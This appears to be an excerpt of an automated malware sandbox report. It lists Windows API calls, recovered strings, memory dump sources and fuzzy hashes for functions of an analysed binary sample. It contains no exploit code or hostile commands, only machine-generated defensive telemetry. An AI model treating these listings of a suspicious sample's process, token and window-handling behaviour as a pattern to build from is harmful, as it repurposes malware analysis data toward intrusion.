                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0097832F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                    • Instruction ID: 7daa732f0f0306f6e8048fc7f18a2287592316d0a2f2f82f67b03b8ba4a68454
                                                                    • Opcode Fuzzy Hash: e3607093832fe2dc7539007505427b2fd72e4e58ab710845fc654c102434a560
                                                                    • Instruction Fuzzy Hash: 0741F332645640EFDB25CF14D99DBE57BE4FB4A755F1882A8E61C4B2A3CB31A841CB40
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00944C95
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00944CB2
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00944CEA
                                                                    • _wcslen.LIBCMT ref: 00944D08
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00944D10
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00944D1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 72514467-0
                                                                    • Opcode ID: a3b038546b08338c0e726e03d7b96ce0f93d996eec0c101fe7c2f0358eff7fb1
                                                                    • Instruction ID: 8e6743aa966f1dbb0846aace8106a7fbc22d5946fc88eed80f997b54b254e7ce
                                                                    • Opcode Fuzzy Hash: a3b038546b08338c0e726e03d7b96ce0f93d996eec0c101fe7c2f0358eff7fb1
                                                                    • Instruction Fuzzy Hash: F5213872604205BBEB255B39EC89F7B7B9CDF45750F10803DF909CE1D2EA61DC4096A0
                                                                    APIs
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                    • _wcslen.LIBCMT ref: 0095587B
                                                                    • CoInitialize.OLE32(00000000), ref: 00955995
                                                                    • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 009559AE
                                                                    • CoUninitialize.OLE32 ref: 009559CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 3172280962-24824748
                                                                    • Opcode ID: 00ef9676209461dfb9e3fb46d70bc5e26a29e061bc12d15d0738681c6b9c7d6f
                                                                    • Instruction ID: a0396ab07ebaacba3068231b0b3205e318ed0e942386bfba970e812140da2b14
                                                                    • Opcode Fuzzy Hash: 00ef9676209461dfb9e3fb46d70bc5e26a29e061bc12d15d0738681c6b9c7d6f
                                                                    • Instruction Fuzzy Hash: C8D186716047019FC714DF1AC4A4A2ABBE5FF8A711F15885DF8899B362CB31EC49CB92
                                                                    APIs
                                                                      • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                      • Part of subcall function 00940FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                      • Part of subcall function 00940FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                      • Part of subcall function 00940FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                      • Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00941335), ref: 009417AE
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009417BA
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 009417C1
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 009417DA
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00941335), ref: 009417EE
                                                                    • HeapFree.KERNEL32(00000000), ref: 009417F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                    • Instruction ID: 9851e8442c766ecd1d31806979590e3ba9f7cd9119304149b5d9d581346aa610
                                                                    • Opcode Fuzzy Hash: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
                                                                    • Instruction Fuzzy Hash: DC118B72628205FFDB109FA4CC89FAE7BBDEB86355F104528F485A7210D736A984DB60
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009414FF
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00941506
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00941515
                                                                    • CloseHandle.KERNEL32(00000004), ref: 00941520
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094154F
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00941563
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                    • Instruction ID: dd40a7792ad5668ac93cad282340f008948a32ce0f8f4a4ed221010d4a3ae9b4
                                                                    • Opcode Fuzzy Hash: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
                                                                    • Instruction Fuzzy Hash: 0411F9B2605209EBDF118F98DD49FDE7BADEF48744F044019FA09A2160C3758EA5EB60
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00903379,00902FE5), ref: 00903390
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0090339E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009033B7
                                                                    • SetLastError.KERNEL32(00000000,?,00903379,00902FE5), ref: 00903409
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 0f7087a8066be854d9d5056048bc47ab1516c5f4ab4b5b58e5cd438ba8413922
                                                                    • Instruction ID: 2ef48b7c9f5e9a6fb7882d42adfeae4fb4387374fa7a868910d479f12a87ad13
                                                                    • Opcode Fuzzy Hash: 0f7087a8066be854d9d5056048bc47ab1516c5f4ab4b5b58e5cd438ba8413922
                                                                    • Instruction Fuzzy Hash: 6B01477322C721BEEA2527747CC67672A9CEF46379320822DF610881F0FF224D416284
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00915686,00923CD6,?,00000000,?,00915B6A,?,?,?,?,?,0090E6D1,?,009A8A48), ref: 00912D78
                                                                    • _free.LIBCMT ref: 00912DAB
                                                                    • _free.LIBCMT ref: 00912DD3
                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DE0
                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DEC
                                                                    • _abort.LIBCMT ref: 00912DF2
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                    • Instruction ID: 1c13220729a4bf92c68932e670ed74ed8364616959261d98f1fdb889071e7856
                                                                    • Opcode Fuzzy Hash: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
                                                                    • Instruction Fuzzy Hash: 01F0A97A7486082BC6123738FD06BDA165D6FC2771F25441CF838961D1EE2488E15160
                                                                    APIs
                                                                      • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                      • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00978A4E
                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00978A62
                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00978A70
                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00978A80
                                                                    • EndPath.GDI32(?), ref: 00978A90
                                                                    • StrokePath.GDI32(?), ref: 00978AA0
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                    • Instruction ID: 16843eb8d3643d2684bba8bf6634e6419f104b7f2462df5efad003d2a79f0b14
                                                                    • Opcode Fuzzy Hash: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
                                                                    • Instruction Fuzzy Hash: 43111B7604414CFFDF129F94DC88EAA7F6DEB08390F008026FA199A1A1C7719D95EFA0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00945218
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00945229
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00945230
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00945238
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094524F
                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00945261
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                    • Instruction ID: a8e79e19d48490d9fcae84ed130d81d70d2cd9e6ae566b22ea5eb197d702a634
                                                                    • Opcode Fuzzy Hash: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
                                                                    • Instruction Fuzzy Hash: 9E0144B6E04719BBEB105BE59C49E5EBFB8EF48751F044065FA08A7281D6709800DFA0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                    • Instruction ID: 14f2f921736c4a5dcc69291dddca9fc84313270fb0c443a6b8bf2e4cf81510d2
                                                                    • Opcode Fuzzy Hash: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
                                                                    • Instruction Fuzzy Hash: 24016CB090275A7DE3008F5A8C85B52FFA8FF19754F00411F915C47941C7F5A864CBE5
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0094EB30
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094EB46
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0094EB55
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB64
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB6E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB75
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
                                                                    • Instruction ID: 5dd85af2c9bc9b242ab2905d3ff9359b59bedfc291e850b54808c25207b2e9a8
                                                                    • Opcode Fuzzy Hash: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
                                                                    • Instruction Fuzzy Hash: 67F03AB3254159BBE7215B629C4EEEF3A7CEFCAB11F00016CF605E1091D7A05A41EAB5
                                                                    APIs
                                                                    • GetClientRect.USER32(?), ref: 00937452
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00937469
                                                                    • GetWindowDC.USER32(?), ref: 00937475
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00937484
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00937496
                                                                    • GetSysColor.USER32(00000005), ref: 009374B0
                                                                    Similarity
                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                    • String ID:
                                                                    • API String ID: 272304278-0
                                                                    • Opcode ID: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                    • Instruction ID: 9b423d4044abf64a70d33b3e0a1a1253786db9518bc33ee00e1a9303da0b3a3b
                                                                    • Opcode Fuzzy Hash: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                    • Instruction Fuzzy Hash: 3F014F72418219FFDB515FA4DC48BA97BB6FB04311F510168F919A21B1CB312E91BF51
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094187F
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0094188B
                                                                    • CloseHandle.KERNEL32(?), ref: 00941894
                                                                    • CloseHandle.KERNEL32(?), ref: 0094189C
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 009418A5
                                                                    • HeapFree.KERNEL32(00000000), ref: 009418AC
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                    • Instruction ID: d6169b2d596888b83cda1afb1395608277df9c0f27a95f3f8510b51d1f670831
                                                                    • Opcode Fuzzy Hash: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                    • Instruction Fuzzy Hash: 3DE0E5B701C101FBEB015FA1ED0C90ABF39FF89B22B508228F22991470CB3294A0EF50
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C6EE
                                                                    • _wcslen.LIBCMT ref: 0094C735
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C79C
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0094C7CA
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                    • String ID: 0
                                                                    • API String ID: 1227352736-4108050209
                                                                    • Opcode ID: b32e44a873d7d084deeb94e20c825739656d2fefda1ee16e88518447ab023505
                                                                    • Instruction ID: c8d52c84b7b306cce4ca676622aeeff638cf07c3e1193226cfe6c989629494ad
                                                                    • Opcode Fuzzy Hash: b32e44a873d7d084deeb94e20c825739656d2fefda1ee16e88518447ab023505
                                                                    • Instruction Fuzzy Hash: 3151EFB161A3419FD7949F28C885F6B77E8EF89324F040A2DF995E32A1DB74D804CB52
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0096AEA3
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • GetProcessId.KERNEL32(00000000), ref: 0096AF38
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096AF67
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 146682121-1426351568
                                                                    • Opcode ID: a7f42126314d095cf056a64bbf7d00c1db0b9df2a78f744c6463f50d6fe51b34
                                                                    • Instruction ID: cfbad4b00f167b02108afbf53b99f1e83fd0ef9170ec274f571bc23261c93fbb
                                                                    • Opcode Fuzzy Hash: a7f42126314d095cf056a64bbf7d00c1db0b9df2a78f744c6463f50d6fe51b34
                                                                    • Instruction Fuzzy Hash: 74715671A00659DFCB14DF59C484A9EBBF4FF09310F048499E816AB2A2CB75ED41CF92
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00947206
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094723C
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094724D
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009472CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                    • Instruction ID: 19778c8dc50477840aac7e7da2094d7dec5597f3dd62d06e362b127996564bb2
                                                                    • Opcode Fuzzy Hash: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                    • Instruction Fuzzy Hash: 714171B1604208DFDB15CFA4C884E9ABBA9EF44314F1480ADBD199F20AD7B4D944CBA0
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973E35
                                                                    • IsMenu.USER32(?), ref: 00973E4A
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973E92
                                                                    • DrawMenuBar.USER32 ref: 00973EA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                    • Instruction ID: 5911064d1dded37fa25b8846f694ac9c6b1a3f9b23827ddb4a16630d59770084
                                                                    • Opcode Fuzzy Hash: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                    • Instruction Fuzzy Hash: 19415976A15209EFDB10DF50D884EAABBB9FF49364F04C12AF909A7250D730AE44EF50
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00941E66
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00941E79
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00941EA9
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2081771294-1403004172
                                                                    • Opcode ID: 8f5a232e00ee7b26464f5392b9dd05a2ddd652e3ec6ff91a91d086269dc2e9af
                                                                    • Instruction ID: c3859a0173b44547a87343a99f75bfd48df52c2b2b7574ed0c0c61910edab79a
                                                                    • Opcode Fuzzy Hash: 8f5a232e00ee7b26464f5392b9dd05a2ddd652e3ec6ff91a91d086269dc2e9af
                                                                    • Instruction Fuzzy Hash: 78213775A00104BADB14AB75DC85CFFB7B8EF82350B104519F815E71E1EB74498A9620
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                    • API String ID: 176396367-4004644295
                                                                    • Opcode ID: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                    • Instruction ID: ed1ddfbab9e946fcc460f9c81827921757d13cc9cc16e1d1098abe4a63c4dc58
                                                                    • Opcode Fuzzy Hash: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                    • Instruction Fuzzy Hash: 9F3106F3A005694BCB30EFECC9411BE33999BA2790B454129FCD5AB345EA70CD80D3A1
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00972F8D
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00972F94
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00972FA9
                                                                    • DestroyWindow.USER32(?), ref: 00972FB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
